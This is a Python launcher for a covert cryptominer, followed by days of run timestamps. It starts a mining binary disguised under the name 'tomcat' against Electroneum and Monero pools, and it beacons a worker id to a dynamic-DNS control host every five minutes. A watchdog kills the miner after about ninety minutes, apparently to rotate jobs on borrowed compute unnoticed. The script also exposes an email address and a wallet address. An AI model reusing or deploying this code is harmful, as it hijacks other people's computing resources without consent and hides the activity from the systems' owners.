import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:26:05.852553
#2018-02-17 16:12:07.312329
#2018-02-17 18:01:07.599011
#2018-02-17 19:48:02.164682
#2018-02-17 21:35:05.129747
#2018-02-17 23:19:07.790803
#2018-02-18 01:07:05.542619
#2018-02-18 02:54:03.624818
#2018-02-18 04:43:01.745051
#2018-02-18 06:35:08.042402
#2018-02-18 08:23:04.754320
#2018-02-18 10:11:05.895848
#2018-02-18 11:57:04.533573
#2018-02-18 13:42:08.416579
#2018-02-18 15:33:05.271173
#2018-02-18 17:21:04.410479
#2018-02-18 19:09:06.286243
#2018-02-18 20:55:04.550586
#2018-02-18 22:41:03.111661
#2018-02-19 00:30:07.193904
#2018-02-19 02:14:07.812256
#2018-02-19 04:01:08.219637
#2018-02-19 05:45:05.857447
#2018-02-19 07:32:05.000129
#2018-02-19 09:22:08.270826
#2018-02-19 11:11:08.234008
#2018-02-19 12:58:07.564574
#2018-02-19 14:47:07.876969
#2018-02-19 16:37:05.893941
#2018-02-19 18:25:02.005794
#2018-02-19 20:12:01.504052
#2018-02-19 22:01:04.073667
#2018-02-19 23:47:03.732752
#2018-02-20 01:34:02.004322
#2018-02-20 03:22:07.833272
#2018-02-20 05:08:01.686381
#2018-02-20 06:51:04.718092
#2018-02-20 08:37:05.137113
#2018-02-20 10:21:05.595006
#2018-02-20 12:06:08.536993
#2018-02-20 13:54:08.417746
#2018-02-20 15:39:08.338412
#2018-02-20 17:23:08.088683
#2018-02-20 19:14:06.782286
#2018-02-20 21:03:06.872421
#2018-02-20 22:47:05.241859
#2018-02-21 00:27:03.934103
#2018-02-21 02:15:09.961272
#2018-02-21 04:04:01.379163
#2018-02-21 05:51:06.058795
#2018-02-21 07:41:01.672206
#2018-02-21 09:25:09.322856
#2018-02-21 11:14:04.929890
#2018-02-21 13:00:11.111130
#2018-02-21 14:48:06.632630
#2018-02-21 16:36:01.955200
#2018-02-21 18:25:09.055900
#2018-02-21 20:10:07.512683
#2018-02-21 21:57:04.423561
#2018-02-21 23:44:04.756281
#2018-02-22 01:36:05.663487
#2018-02-22 03:23:06.163299
#2018-02-22 05:11:07.157267
#2018-02-22 06:54:07.982134
#2018-02-22 08:42:06.327138
#2018-02-22 10:29:07.149024
#2018-02-22 12:14:01.507151
#2018-02-22 13:59:07.588229
#2018-02-22 15:46:03.007189
#2018-02-22 17:33:02.092022
#2018-02-22 19:19:05.848242
#2018-02-22 21:12:08.216012
#2018-02-22 22:57:06.277222
#2018-02-23 00:45:08.707960
#2018-02-23 02:33:01.840556
#2018-02-23 04:22:02.083942
#2018-02-23 06:07:06.866931
#2018-02-23 07:53:05.122110
#2018-02-23 10:11:01.750963
#2018-02-23 12:04:02.117997
#2018-02-23 13:51:10.240495
#2018-02-23 15:43:09.337552
#2018-02-23 17:28:08.494877
#2018-02-23 19:13:06.959942
#2018-02-23 20:59:07.200836
#2018-02-23 22:51:05.873707
#2018-02-24 00:40:08.163675
#2018-02-24 02:31:04.370949
#2018-02-24 04:24:07.437387
#2018-02-24 06:10:08.834129
#2018-02-24 07:57:02.001289
#2018-02-24 09:41:01.411988
#2018-02-24 11:36:03.653928
#2018-02-24 13:26:06.261013
#2018-02-24 15:15:03.215086
#2018-02-24 17:04:07.076739
#2018-02-24 18:55:05.913402
#2018-02-24 20:42:02.017406
#2018-02-24 22:51:04.761848
#2018-02-25 03:05:01.455860
#2018-02-25 07:07:06.119933